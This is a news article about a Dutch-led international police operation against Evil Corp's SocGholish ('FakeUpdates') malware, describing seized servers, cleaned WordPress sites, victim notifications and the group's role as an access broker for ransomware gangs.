In a significant law enforcement operation, police managed to seize over a hundred servers linked to a notorious hacking group known for selling access to hacked computers. The operation also involved cleaning up tens of thousands of websites that had unwittingly become hosts for the group’s malicious activities, specifically a trap known as ClickFix, which utilized social engineering techniques to recruit victims. This disruption marks a critical blow to the cybercrime landscape that has been significantly shaped by the Russian-speaking syndicate Evil Corp.

Dutch police unveiled the operation last Thursday, announcing that they successfully disrupted a vital infection chain associated with Evil Corp. Officials noted that the police action not only severed access to compromised systems but also provided an essential security layer to thousands of victims.

Maikel Rollman, a representative of the Dutch National High Tech Crime Unit which orchestrated the operation, emphasized the significance of these activities. “With these actions, we deprive cybercriminals of access to infected computer systems,” he stated. The crackdown was a collaborative effort, working alongside agencies such as the FBI, Royal Canadian Mounted Police, and Germany’s Federal Criminal Police Office, with additional support from Europol, Eurojust, and various private sector partners.

Rollman further hinted at future actions against SocGholish, the malware family linked to this operation. Also referred to as “FakeUpdates,” this malware cleverly disguises itself as a legitimate software update, seeking to dupe unsuspecting users into installation.

Evil Corp—also identified as Mustard Tempest, UNC1543, and TA569—has been a fundamental player in the realm of cybercrime-as-a-service since its inception in 2017. According to security firm Orange Cyberdefense, British law enforcement agencies have made connections between Evil Corp and the Russian government, suggesting that the Kremlin utilizes the group for cyberattacks and espionage activities.

As part of this operation, direct notifications were sent to owners of WordPress sites that had been compromised by SocGholish. Various organizations, including HaveIBeenPwned, Spamhaus, and the Dutch National Cyber Security Center, participated in notifying affected site owners. The notifications provided crucial information, confirming the removal of malware from their sites while encouraging them to enhance their security measures—such as changing passwords, enabling multifactor authentication, and deleting any unauthorized accounts.

HaveIBeenPwned reported receiving a list consisting of 154,000 email addresses targeted during SocGholish attacks. This list also included over half a million previously unrecognized passwords acquired by the group.

Data from the Dutch police revealed that SocGholish was active on nearly 15,000 websites, and cybercriminals managed to obtain login credentials for approximately 1.4 million sites. This latest disruption is part of the ongoing international law enforcement initiative known as Operation Endgame, launched in 2024 to systematically dismantle cybercrime networks and bring their perpetrators to justice. This initiative has previously led to the dismantling of botnets, illicit hosting services, and even resulted in multiple arrests.

Experts emphasize the role of SocGholish in the cybercrime ecosystem, clarifying that it often serves as the initial phase of an attack rather than the final step. According to researchers, SocGholish acts as a JavaScript-based downloader under the control of financially motivated individuals who frequently operate as brokers providing access for other cybercriminals, including ransomware groups and nation-state actors.

Evil Corp’s continued focus on widely-used content management systems such as WordPress—known to power nearly 43% of the internet—further underlines the organization’s relentless pursuit of vulnerabilities to exploit. They exploit known vulnerabilities or deployed stolen credentials to gain entry into these systems, subsequently injecting malicious JavaScript designed to execute under certain conditions. Victims often encounter attacks where they are deceptively prompted to update their browsers by clicking on misleading download links.

Unfortunately, this can lead to the installation of malware that ultimately connects users to command-and-control servers operated by the group. The malware that follows includes infostealers, ransomware such as LockBit and WastedLocker, and various remote access Trojans like AsyncRAT and NetSupport RAT.

The implications of SocGholish’s operations are extensive, affecting a variety of sectors, including legal firms, educational institutions, healthcare providers, and hospitals. Renée Burton, vice president of threat intelligence at Infoblox, pointed out the pervasive reach of the group’s activities. “SocGholish is not a niche threat. Their operations penetrate deeply into both public sector and commercial environments, facilitating access for other cybercriminals,” she stated.

Infoblox analysis highlights that over half of its cloud clients encountered websites controlled by SocGholish within the year, including critical infrastructure organizations. The law enforcement community continues to grapple with the persistent threat posed by Evil Corp, which remains associated with numerous illicit activities, from malware distribution to large-scale ransomware and money laundering operations. With many members of this group operating from behind jurisdictions that shield them from Western law enforcement, authorities may find it challenging to eliminate the threat completely. Experts anticipate that the group will likely regroup and attempt to re-establish their operations, given the resilience exhibited by cybercrime organizations historically.